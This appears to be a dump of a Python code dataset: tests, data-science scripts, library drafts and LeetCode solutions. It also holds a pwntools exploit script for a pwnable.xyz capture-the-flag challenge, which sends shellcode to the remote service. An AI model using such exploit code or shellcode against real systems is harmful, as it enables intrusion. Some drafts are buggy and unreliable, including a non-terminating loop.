        self.assertEqual(NSXMLParserCommentNotFinishedError, 45)
        self.assertEqual(NSXMLParserProcessingInstructionNotStartedError, 46)
        self.assertEqual(NSXMLParserProcessingInstructionNotFinishedError, 47)
        self.assertEqual(NSXMLParserNotationNotStartedError, 48)
        self.assertEqual(NSXMLParserNotationNotFinishedError, 49)
        self.assertEqual(NSXMLParserAttributeListNotStartedError, 50)
        self.assertEqual(NSXMLParserAttributeListNotFinishedError, 51)
        self.assertEqual(NSXMLParserMixedContentDeclNotStartedError, 52)
        self.assertEqual(NSXMLParserMixedContentDeclNotFinishedError, 53)
        self.assertEqual(NSXMLParserElementContentDeclNotStartedError, 54)
        self.assertEqual(NSXMLParserElementContentDeclNotFinishedError, 55)
        self.assertEqual(NSXMLParserXMLDeclNotStartedError, 56)
        self.assertEqual(NSXMLParserXMLDeclNotFinishedError, 57)
        self.assertEqual(NSXMLParserConditionalSectionNotStartedError, 58)
        self.assertEqual(NSXMLParserConditionalSectionNotFinishedError, 59)
        self.assertEqual(NSXMLParserExternalSubsetNotFinishedError, 60)
        self.assertEqual(NSXMLParserDOCTYPEDeclNotFinishedError, 61)
        self.assertEqual(NSXMLParserMisplacedCDATAEndStringError, 62)
        self.assertEqual(NSXMLParserCDATANotFinishedError, 63)
        self.assertEqual(NSXMLParserMisplacedXMLDeclarationError, 64)
        self.assertEqual(NSXMLParserSpaceRequiredError, 65)
        self.assertEqual(NSXMLParserSeparatorRequiredError, 66)
        self.assertEqual(NSXMLParserNMTOKENRequiredError, 67)
        self.assertEqual(NSXMLParserNAMERequiredError, 68)
        self.assertEqual(NSXMLParserPCDATARequiredError, 69)
        self.assertEqual(NSXMLParserURIRequiredError, 70)
        self.assertEqual(NSXMLParserPublicIdentifierRequiredError, 71)
        self.assertEqual(NSXMLParserLTRequiredError, 72)
        self.assertEqual(NSXMLParserGTRequiredError, 73)
        self.assertEqual(NSXMLParserLTSlashRequiredError, 74)
        self.assertEqual(NSXMLParserEqualExpectedError, 75)
        self.assertEqual(NSXMLParserTagNameMismatchError, 76)
        self.assertEqual(NSXMLParserUnfinishedTagError, 77)
        self.assertEqual(NSXMLParserStandaloneValueError, 78)
        self.assertEqual(NSXMLParserInvalidEncodingNameError, 79)
        self.assertEqual(NSXMLParserCommentContainsDoubleHyphenError, 80)
        self.assertEqual(NSXMLParserInvalidEncodingError, 81)
        self.assertEqual(NSXMLParserExternalStandaloneEntityError, 82)
        self.assertEqual(NSXMLParserInvalidConditionalSectionError, 83)
        self.assertEqual(NSXMLParserEntityValueRequiredError, 84)
        self.assertEqual(NSXMLParserNotWellBalancedError, 85)
        self.assertEqual(NSXMLParserExtraContentError, 86)
        self.assertEqual(NSXMLParserInvalidCharacterInEntityError, 87)
        self.assertEqual(NSXMLParserParsedEntityRefInInternalError, 88)
        self.assertEqual(NSXMLParserEntityRefLoopError, 89)
        self.assertEqual(NSXMLParserEntityBoundaryError, 90)
        self.assertEqual(NSXMLParserInvalidURIError, 91)
        self.assertEqual(NSXMLParserURIFragmentError, 92)
        self.assertEqual(NSXMLParserNoDTDError, 94)
        self.assertEqual(NSXMLParserDelegateAbortedParseError, 512)

        self.assertIsInstance(NSXMLParserErrorDomain, unicode)

        # NSXMLParserExternalEntityResolvingPolicy values.
        self.assertEqual(NSXMLParserResolveExternalEntitiesNever, 0)
        self.assertEqual(NSXMLParserResolveExternalEntitiesNoNetwork, 1)
        self.assertEqual(NSXMLParserResolveExternalEntitiesSameOriginOnly, 2)
        self.assertEqual(NSXMLParserResolveExternalEntitiesAlways, 3)

    def testMethods(self):
        """BOOL arguments and results must be bridged as Python bools."""
        self.assertArgIsBOOL(NSXMLParser.setShouldProcessNamespaces_, 0)
        self.assertArgIsBOOL(NSXMLParser.setShouldReportNamespacePrefixes_, 0)
        self.assertArgIsBOOL(NSXMLParser.setShouldResolveExternalEntities_, 0)
        self.assertResultIsBOOL(NSXMLParser.shouldProcessNamespaces)
        self.assertResultIsBOOL(NSXMLParser.shouldReportNamespacePrefixes)
        self.assertResultIsBOOL(NSXMLParser.shouldResolveExternalEntities)
        self.assertResultIsBOOL(NSXMLParser.parse)

    @min_sdk_level("10.6")
    def testProtocols(self):
        """The NSXMLParserDelegate protocol must be registered with the bridge."""
        objc.protocolNamed("NSXMLParserDelegate")
if __name__ == "__main__":
main()
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
493732ef5e682d77728de4f09cfa5661fafc89c7 | ded5e3001325a4d27569c2f41079a68762a82506 | /photutils/isophote/tests/test_geometry.py | 429a7ec42fd613a4cad8afbb2770360e7317e26a | [
"BSD-3-Clause"
] | permissive | chaorun/photutils | fd326aa3b799aeaa07cc97a9274343f64bc21ef9 | 412e0d9907eecd88402913f0787e27065644e473 | refs/heads/master | 2022-10-06T22:16:39.834650 | 2022-09-19T18:03:54 | 2022-09-19T18:03:54 | 71,716,518 | 0 | 0 | null | 2016-10-23T16:55:33 | 2016-10-23T16:55:33 | null | UTF-8 | Python | false | false | 4,934 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Tests for the geometry module.
"""
import numpy as np
from numpy.testing import assert_allclose
import pytest
from ..geometry import EllipseGeometry
@pytest.mark.parametrize('astep, linear_growth', [(0.2, False), (20., True)])
def test_geometry(astep, linear_growth):
    """Bounding ellipses and sector geometry of a tilted ellipse."""
    geom = EllipseGeometry(255., 255., 100., 0.4, np.pi / 2, astep,
                           linear_growth)

    inner_sma, outer_sma = geom.bounding_ellipses()
    assert_allclose((inner_sma, outer_sma), (90.0, 110.0), atol=0.01)

    # An arbitrary 0.6 rad angle keeps the polar vector off the
    # ellipse's axes.
    vx, vy = geom.initialize_sector_geometry(0.6)
    assert_allclose(geom.sector_angular_width, 0.0571, atol=0.01)
    assert_allclose(geom.sector_area, 63.83, atol=0.01)
    assert_allclose(vx, [215.4, 206.6, 213.5, 204.3], atol=0.1)
    assert_allclose(vy, [316.1, 329.7, 312.5, 325.3], atol=0.1)
def test_to_polar():
    """Cartesian -> polar conversion for circles with different position angles."""
    # Trivial case: circle centered at (0., 0.).
    circ = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)

    radius, angle = circ.to_polar(100., 0.)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, 0., atol=0.0001)

    radius, angle = circ.to_polar(0., 100.)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, np.pi / 2., atol=0.0001)

    # Vector of length 100. at a 45 deg angle.
    radius, angle = circ.to_polar(70.71, 70.71)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, np.pi / 4., atol=0.0001)

    # Same circle with the position angle tilted 45 deg from the X axis.
    tilted = EllipseGeometry(0., 0., 100., 0.0, np.pi / 4., 0.2, False)

    radius, angle = tilted.to_polar(100., 0.)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, np.pi * 7. / 4., atol=0.0001)

    radius, angle = tilted.to_polar(0., 100.)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, np.pi / 4., atol=0.0001)

    # Vector of length 100. at a 45 deg angle.
    radius, angle = tilted.to_polar(70.71, 70.71)
    assert_allclose(radius, 100., atol=0.1)
    assert_allclose(angle, np.pi * 2., atol=0.0001)
def test_area():
    """Sector vertices for a circle centered at the origin."""
    circ = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)

    # Sector at 45 deg on the circle.
    vx, vy = circ.initialize_sector_geometry(45. / 180. * np.pi)
    assert_allclose(vx, [65.21, 79.70, 62.03, 75.81], atol=0.01)
    assert_allclose(vy, [62.03, 75.81, 65.21, 79.70], atol=0.01)

    # Sector at 0 deg on the circle.
    vx, vy = circ.initialize_sector_geometry(0)
    assert_allclose(vx, [89.97, 109.97, 89.97, 109.96], atol=0.01)
    assert_allclose(vy, [-2.25, -2.75, 2.25, 2.75], atol=0.01)
def test_area2():
    """Sector vertices for a circle centered away from the origin."""
    # Circle with center at (100., 100.).
    circ = EllipseGeometry(100., 100., 100., 0.0, 0., 0.2, False)

    # Sector at 45 deg on the circle.
    vx, vy = circ.initialize_sector_geometry(45. / 180. * np.pi)
    assert_allclose(vx, [165.21, 179.70, 162.03, 175.81], atol=0.01)
    assert_allclose(vy, [162.03, 175.81, 165.21, 179.70], atol=0.01)

    # Sector at 225 deg on the circle.
    vx, vy = circ.initialize_sector_geometry(225. / 180. * np.pi)
    assert_allclose(vx, [34.79, 20.30, 37.97, 24.19], atol=0.01)
    assert_allclose(vy, [37.97, 24.19, 34.79, 20.30], atol=0.01)
def test_reset_sma():
    """reset_sma for geometric (relative) and linear sma growth modes."""
    geom = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
    sma, step = geom.reset_sma(0.2)
    assert_allclose(sma, 83.33, atol=0.01)
    assert_allclose(step, -0.1666, atol=0.001)

    geom = EllipseGeometry(0., 0., 100., 0.0, 0., 20., True)
    sma, step = geom.reset_sma(20.)
    assert_allclose(sma, 80., atol=0.01)
    assert_allclose(step, -20., atol=0.01)
def test_update_sma():
    """update_sma grows the sma by one step in both growth modes."""
    geom = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
    assert_allclose(geom.update_sma(0.2), 120., atol=0.01)

    geom = EllipseGeometry(0., 0., 100., 0.0, 0., 20., True)
    assert_allclose(geom.update_sma(20.), 120., atol=0.01)
def test_polar_angle_sector_limits():
    """Angular limits of a sector after initializing sector geometry."""
    geom = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)
    geom.initialize_sector_geometry(np.pi / 3)

    lo, hi = geom.polar_angle_sector_limits()
    assert_allclose(lo, 1.022198, atol=0.0001)
    assert_allclose(hi, 1.072198, atol=0.0001)
def test_bounding_ellipses():
    """Inner/outer bounding sma values for a geometric 0.2 step."""
    geom = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)
    assert_allclose(geom.bounding_ellipses(), (90.0, 110.0), atol=0.01)
def test_radius():
    """Ellipse radius along the major and minor axes (eps = 0.3)."""
    geom = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)

    assert_allclose(geom.radius(0.0), 100.0, atol=0.01)
    assert_allclose(geom.radius(np.pi / 2), 70.0, atol=0.01)
| [
"larry.bradley@gmail.com"
] | larry.bradley@gmail.com |
70ac98d9dfba4a7289fd21971f5fce26d9042a0d | 99c77a1816f2c3856f7ecb0b30ebd918ec72bb02 | /drafts/examples.py | 1ee9307ecbe8c56138872749ba7e726f9a99adde | [
"BSD-3-Clause"
] | permissive | aykut/funcy | 6b7bf80ed5d54b2d3b7d7cece239f2aeb75965f2 | 45aa6ad10ab3ea8f92f33cfc99615a7d1328ff61 | refs/heads/master | 2021-01-21T20:22:46.628680 | 2013-11-24T06:10:05 | 2013-11-24T06:10:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,471 | py | has_comment = re_tester(r'#')
value.value = walk_values(prepare, value.value)
json_field = partial(field, json=True)
re = lambda pattern: lambda value: re_test(pattern, value)
re = curry(re_test)
def translate_dict(d):
lines = ('%s: %s' % (k, v) for k, v in walk_values(translate, d).items())
return '{%s}' % ','.join(lines)
def _locals(func):
if func.__closure__:
names = func.__code__.co_freevars
values = [cell.cell_contents for cell in func.__closure__]
return zipdict(names, values)
else:
return {}
names = _code_names(code)
return merge(project(__builtins__, names), project(func.__globals__, names))
def closure(func):
return merge(_globals(func), _locals(func))
class namespace_meta(type):
def __new__(cls, name, bases, attrs):
attrs = walk_values(iffy(callable, staticmethod), attrs)
return super(namespace_meta, cls).__new__(cls, name, bases, attrs)
class namespace(object):
__metaclass__ = namespace_meta
names = chain.from_iterable(get_all_names(color))
try:
return ifilter(None, imap(COLOR_BY_NAME.get, names)).next()
except StopIteration:
return unknown()
etags = map(etag_from_response, responses)
etags = filter(None, etags)
phones = filter(None, map(stub_to_phone, _extract_stubs(text)))
return reduce(concat, map(extract_updates, rows))
op_js = ' %s ' % node.op.js
node.js = op_js.join(v.js for v in node.values)
' '.join(n.js for n in interpose(node.op, node.values))
mapcat(translate, interpose(node.op, node.values))
translate_items(interpose(node.op, node.values))
35: while self.exists(name):
36 name = name_fmt % i
37 i += 1
@property
def path(self):
    """Ancestors of this node ordered root-first; the node itself is excluded."""
    ancestors = []
    node = self.parent
    while node:
        ancestors.append(node)
        node = node.parent
    ancestors.reverse()
    return ancestors
# Candidate spellings of the same ancestor-walk pipeline (drafts):
path = takewhile(bool, iterate(_.parent, self))
path = takewhile(bool, iterate(attrgetter('parent'), self))
path = takewhile(bool, iterate(lambda node: node.parent, self))
path = takewhile(notnone, iterate(lambda node: node.parent, self))
return reversed(rest(path))
# Draft query: per-user test rows ordered by time.
# NOTE(review): SQL assembled via %-interpolation — acceptable in a draft,
# unsafe for untrusted input.
users_cond = str_join(',', users)
tests = fetch_named('''
select user_id, full_min, full_max, datetime from player_testtracking
where %s and user_id in %s
order by user_id, datetime
''' % (USEFUL_TEST_COND, users_cond))
# Sliding pairs (window 2, step 1) of consecutive tests within each
# user's partition.
get_pairs = partial(partition, 2, 1)
return mapcat(get_pairs, ipartition_by(itemgetter(0), tests))
| [
"suor.web@gmail.com"
] | suor.web@gmail.com |
6a673f2479c8785346a9bc8dabf6c261ba4e522d | 27f4beaaf19b3d599d9cf18e8793b92a9bd52441 | /examples/plot_arrival_angles_static.py | 48c02e743ccc72f660c56e8a6b63c8ec5c6bca0e | [
"MIT"
] | permissive | annierak/odor_tracking_sim | da70b2bd01c3d2199e98bb05441b2a918aca1025 | 4600a7be942666c3a5a0f366dab6d14838f332a0 | refs/heads/master | 2021-04-27T22:07:33.015377 | 2019-07-04T00:36:56 | 2019-07-04T00:36:56 | 122,412,726 | 0 | 0 | MIT | 2018-02-22T00:48:39 | 2018-02-22T00:48:39 | null | UTF-8 | Python | false | false | 1,406 | py | import scipy
import math
import matplotlib.pyplot as plt
import cPickle as pickle
import sys
import odor_tracking_sim.utility as utility
f = sys.argv[1]
input_file = f+'.pkl'
with open(input_file,'r') as f:
(swarm,wind_field) = pickle.load(f)
trap_num_list = swarm.list_all_traps()
plt.figure(2)
ax1 = plt.subplot2grid((3,4),(1,3),polar=True)
ax2 = plt.subplot2grid((3,4),(0,2),polar=True)
ax3 = plt.subplot2grid((3,4),(0,1),polar=True)
ax4 = plt.subplot2grid((3,4),(1,0),polar=True)
ax5 = plt.subplot2grid((3,4),(2,1),polar=True)
ax6 = plt.subplot2grid((3,4),(2,2),polar=True)
trap_axes = [ax1,ax2,ax3,ax4,ax5,ax6]
num_bins = 20
# peak_counts = scipy.zeros(len(trap_axes))
for i in trap_num_list:
ax = trap_axes[i]
ax.set_yticks([])
ax.set_title('trap:{0}'.format(i))
arrival_angles = swarm.get_angle_trapped(i,[])
if len(arrival_angles)>0:
(n, bins, patches) = ax.hist(arrival_angles,num_bins,range=(0,2*scipy.pi))
# peak_counts[i]=max(n)
ax.set_xlabel('Arrival angle')
# top = max(peak_counts)
trap_counts = swarm.get_trap_counts()
print(trap_counts)
for i,num in enumerate(trap_num_list):
ax = trap_axes[num]
# ax.set_ylim(0,top)
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ax.text(scipy.radians(270),ymin+(ymax-ymin)/2,str(int(trap_counts[i])),
color='maroon',size =20,horizontalalignment='center')
plt.show()
| [
"annie1rak@gmail.com"
] | annie1rak@gmail.com |
016ceae1fb089ac2590ce2b0ef4ad91a953cd33f | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/foodDistribution_20200703204251.py | 500e39347904ba1f81a3ee35340998020d787544 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | def food(arr):
# removes the item at index 0
sandwiches = arr.pop(0)
# this loop runs only when sandwiches are greater than 0,otherwise we exit the while loop
while sandwiches > 0:
highest = -1
maxred = -1
# looping throught the hunger levels
for i in range(len(arr)):
# checking if elements in the array are greater than 0
if arr[i] > 0:
currDiff = 0
# if index we are at ain't 0
if i > 0:
# we get the difference between adjacent pairs
currDiff = abs(arr[i]-arr[i-1])
print('here1')
print(arr[i],'-',arr[i-1],'==',currDiff)
if i < len(arr) -1:
currDiff =abs(arr[i] - arr[i+1])
print('here2')
print(arr[i],'-',arr[i-1],'==',currDiff)
newDiff = 0
if i > 0:
newDiff = abs(arr[i]-1 - arr[i-1])
print('here3')
print(arr[i]-1,'-',arr[i-1],'==',newDiff)
if i < len(arr)-1:
newDiff = abs(arr[i]-1-arr[i+1])
print('here4')
print(arr[i]-1,'-',arr[i+1],'==',newDiff)
red = currDiff - newDiff
if red > maxred:
highest = i
maxred = red
if highest == -1:
return 0
else:
arr[highest] = arr[highest]
# we get the difference
print(food([5, 3, 1, 2, 1]))
| [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
76b974be2a0f5441e010a43be073cb061a27fe05 | 24bd4ade62c73f92d7f8fa5f5f8d4b49efc6c829 | /Feature Selection.py | 2944e417655d7f5f3ebb154cf9a16c7d0a4e66ea | [
"MIT"
] | permissive | kuangzijian/Data-Preprocessing-and-Decision-Tree | ea4f13113e2a40c32ea2334dac3284ed843dd6a9 | a672cccfe74fdfdf1664305e21daebf956c53bfc | refs/heads/main | 2023-01-23T07:17:43.403216 | 2020-12-05T03:44:35 | 2020-12-05T03:44:35 | 302,569,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import numpy as np
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import RFE
from sklearn import datasets, linear_model
# List all the columns of the dataset and report the size of the train part and test part
# Load the diabetes CSV (header skipped); columns 0-7 are predictors,
# column 8 is the class label.
A = np.loadtxt(open('data/diabetes.csv', 'r'), delimiter=",", skiprows=1)
A = np.array(A)
x = A[:, 0:8]
y = A[:, 8]
print(x.shape)
# Use Chi squared feature selection approach to select 4 best features of the dataset
x_chi = SelectKBest(chi2, k=4).fit_transform(x, y)
print(x_chi.shape)
print(x_chi)
# Use Recursive Feature Elimination approach to select 4 best features of the dataset
# RFE drops one feature per iteration (step=1) using a linear-regression
# estimator until 4 remain.
estimator = linear_model.LinearRegression()
rfe = RFE(estimator, n_features_to_select=4, step=1)
rfe.fit(x, y)
x_rec = rfe.transform(x)
print(x_rec.shape)
print(x_rec)
| [
"kuangzijian1@hotmail.com"
] | kuangzijian1@hotmail.com |
c9753409076dcbbf2f799658fdd2575274b657c2 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/primeMover_20200714151021.py | 47cb0dc4deb41c8214b4217291596ba68847162a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | import math
def PrimeMover(num):
    """Return the num-th prime number (1-indexed), e.g. PrimeMover(1) == 2.

    Candidates are searched in [2, 10**4), matching the original bound;
    returns None if num exceeds the number of primes below that bound
    (the original also fell off the end and returned None in that case).
    """
    count = 0
    for candidate in range(2, 10 ** 4):
        if is_prime(candidate):
            count += 1
            if count == num:
                return candidate
    return None


def is_prime(number):
    """Return True when number is prime (trial division up to sqrt(number)).

    The original body was truncated mid-statement; this completes it with the
    standard check: numbers <= 1 are not prime, otherwise test divisors
    2..floor(sqrt(number)).
    """
    if number <= 1:
        return False
    for divisor in range(2, int(math.sqrt(number)) + 1):
        if number % divisor == 0:
            return False
    return True
print(PrimeMover(9)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
8450999f90b1b3376b22bfb3db204e7d2308d460 | e210167f253547473d160d3c1c286b10ea3650a1 | /209.py | 9cdf1e1c4944c60ad5515e9350435eb445ac5436 | [] | no_license | cowarder/LeetCode | ee231f7bab0bb1525e187f770c15dbf339daba87 | 7d785a11fe2bd2bc3399984e0c0af8546780e185 | refs/heads/master | 2021-01-11T19:20:09.248360 | 2020-07-19T08:04:27 | 2020-07-19T08:04:27 | 79,439,657 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | """
问题描述:
209. Minimum Size Subarray Sum
Given an array of n positive integers and a positive integer s, find the minimal length of a contiguous subarray of
which the sum ≥ s. If there isn't one, return 0 instead.
Example:
Input: s = 7, nums = [2,3,1,2,4,3]
Output: 2
Explanation: the subarray [4,3] has the minimal length under the problem constraint.
Follow up:
If you have figured out the O(n) solution, try coding another solution of which the time complexity is O(n log n).
"""
"""
解题思路:
求出数列中,连续和大于等于s的最短序列长度
考虑到数组中的连续问题,应该想到双指针
这里我们用两个指针left和right来表示求和数组的两端,当两端之间的和大于等于s的时候
需要将左边的指针右移,直到两个指针之间的和小于s
"""
class Solution(object):
    def minSubArrayLen(self, s, nums):
        """
        :type s: int
        :type nums: List[int]
        :rtype: int

        Sliding-window scan: grow the window to the right, and while its sum
        still meets s shrink it from the left, tracking the smallest length
        seen.  Returns 0 when no subarray sums to at least s (including the
        empty-input case).
        """
        best = float('inf')
        window_sum = 0
        left = 0
        for right, value in enumerate(nums):
            window_sum += value
            while window_sum >= s:
                best = min(best, right - left + 1)
                window_sum -= nums[left]
                left += 1
        return 0 if best == float('inf') else best
"1615482151@qq.com"
] | 1615482151@qq.com |
ae8b3cf0d41725d8e0bdc373ec63f37deac7fc30 | ea37a8cefb6639e87e9dcfaf047a08cc56c5059b | /executioner2/challenge/exploit.py | 705e2740f95f1e1d55a91cbf38786161a0a0fd36 | [] | no_license | AravGarg/pwnable.xyz-My-exploits | 9f0253a844a33f8583446d3eae34fa0110c57e52 | 9a97b4b85b889bd057f493081d27155cbea96c12 | refs/heads/master | 2022-12-01T08:02:32.385746 | 2020-07-31T11:36:41 | 2020-07-31T11:36:41 | 280,766,873 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | from pwn import *
# Keep reconnecting until the service hands us a leaked pointer that is
# 16-byte aligned; unaligned leaks are discarded and the connection retried.
while(True):
    #target=process('./challenge')
    target=remote('svc.pwnable.xyz',30028)
    print(target.recvuntil("0x"))
    # Parse the hex address the binary prints after "0x".
    leak=int(target.recvline().strip("\n"),16)
    print(hex(leak))
    if(leak%0x10!=0):
        target.close()
        continue
    break
print(target.recvuntil("> "))
#sol=solve([x*(leak-x)%0x100000000-0x20])
#print(sol)
print(hex(0x10000000*(leak-0x10000000)))
# NOTE(review): presumably the challenge combines these two operands
# (see the product printed above) — confirm against the binary.
target.sendline(str(leak-0x10000000)+" "+str(0x10000000))
pause()
# Hand-written machine code sent verbatim to the service at the next prompt.
shellcode="\x00\x02\x4C\x8B\x65\x00\x49\x81\xEC\xDA\x02\x00\x00\x41\xFF\xE4"
print(target.recvuntil(": "))
target.sendline(shellcode)
target.interactive()
target.interactive()
| [
"arav1635@gmail.com"
] | arav1635@gmail.com |
46f697365658fffc24989e1d4b613b36fb08ac8a | 72b77f97876983025eb05a5aa1d6f248a1be3074 | /reformat_the_string.py | 0b9f7353ad46168bc5bafff1dd3692a8845340cb | [
"Apache-2.0"
] | permissive | erjan/coding_exercises | 4c6bccb2cdac65ccbc3107a482914275ecd157f7 | 68dac358a6d4dabd41d47dbd4addb2ec50e0ca11 | refs/heads/master | 2023-09-02T07:25:30.886175 | 2023-08-27T06:13:06 | 2023-08-27T06:13:06 | 236,281,070 | 5 | 0 | Apache-2.0 | 2020-05-05T15:08:49 | 2020-01-26T07:32:09 | Python | UTF-8 | Python | false | false | 1,337 | py | '''
You are given an alphanumeric string s. (Alphanumeric string is a string consisting of lowercase English letters and digits).
You have to find a permutation of the string where no letter is followed by another letter and no digit is followed by another digit. That is, no two adjacent characters have the same type.
Return the reformatted string or return an empty string if it is impossible to reformat the string.
'''
class Solution:
    def reformat(self, s: str) -> str:
        """Return a permutation of s in which letters and digits strictly alternate.

        Returns the empty string when no such permutation exists, i.e. when
        the letter and digit counts differ by more than one.

        Fixes over the original: removed leftover debug print() calls, the
        redundant len(s) == 1 special case, and the three near-duplicate
        interleaving loops.  Return values are unchanged for every input.
        """
        digits = [ch for ch in s if ch.isdigit()]
        letters = [ch for ch in s if not ch.isdigit()]
        # An alternating arrangement exists iff the group sizes differ by <= 1.
        if abs(len(digits) - len(letters)) > 1:
            return ''
        # Interleave starting with the larger group (letters win ties, matching
        # the original's ordering); the longer group supplies the final char.
        if len(letters) >= len(digits):
            first, second = letters, digits
        else:
            first, second = digits, letters
        out = []
        for a, b in zip(first, second):
            out.append(a)
            out.append(b)
        if len(first) > len(second):
            out.append(first[-1])
        return ''.join(out)
| [
"noreply@github.com"
] | erjan.noreply@github.com |
1bcfeec89c5fc7aac268acfecb773764dbb81c78 | b84b66f071050213a18ea6824fae443271f7d166 | /0739_Daily_Temperatures.py | 35a67a047f5a1cf04ff520d9943d69a65f7bb8c6 | [] | no_license | oveis/LeetCode | c4c400196de0cae4cd963384c7cb4826aa11e078 | 9ea466f1ebfd976b60dfa2ff2e8b0b2e5c99a9b3 | refs/heads/master | 2021-06-26T04:32:16.373204 | 2021-01-02T08:13:09 | 2021-01-02T08:13:09 | 192,046,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | class Solution(object):
def dailyTemperatures(self, T):
"""
:type T: List[int]
:rtype: List[int]
"""
ans = [0] * len(T)
stack = []
for idx, temp in enumerate(T):
while stack and stack[-1][0] < temp:
_, prev_i = stack.pop()
ans[prev_i] = idx - prev_i
stack.append((temp, idx))
return ans
| [
"jinil@nyu.edu"
] | jinil@nyu.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.